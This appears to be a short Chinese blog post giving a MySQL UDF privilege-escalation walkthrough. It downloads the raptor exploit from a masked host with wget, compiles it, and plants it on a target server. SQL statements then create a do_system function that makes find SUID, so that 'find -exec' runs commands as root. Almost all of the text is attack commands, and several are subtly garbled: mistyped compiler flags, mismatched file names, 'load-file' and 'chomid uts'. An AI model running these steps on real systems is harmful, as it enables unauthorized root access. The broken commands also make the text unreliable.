1、利用MYSQL udf POC编译

下载1158exp

wget http://xxx.xxx.xxx.xxx/1158

修改1158文件修改为raptor.c

mv 1158 raptor.c

然后gcc编译为成.so文件

gcc -g -c raptor.c

gcc -g -shard -o raptor_udf.so raptor_udf.o -lc

mv raptor.udf.so 1158.so

下载1158到目标服务器

wget http://xxx.xxx.xxx.xxx/1158

进入数据库进行udf导出

1、use mysql;
2、create table foo(line blob);
3、insert into foo values(load-file('/tmp/1158.so'));\
4、select * from foo into dumpfile '/usr/lib/mysql/plugin/1158.so';
创建do_system函数调用
5、create function do_system returns integer soname '1158.so';
6、select do_system('chomid uts /usr/bin/find');
#配合使用find调用执行
touch xidi
find xidi -exec "whoami" \;
最后编辑:2022年01月29日 ©著作权归作者所有

发表评论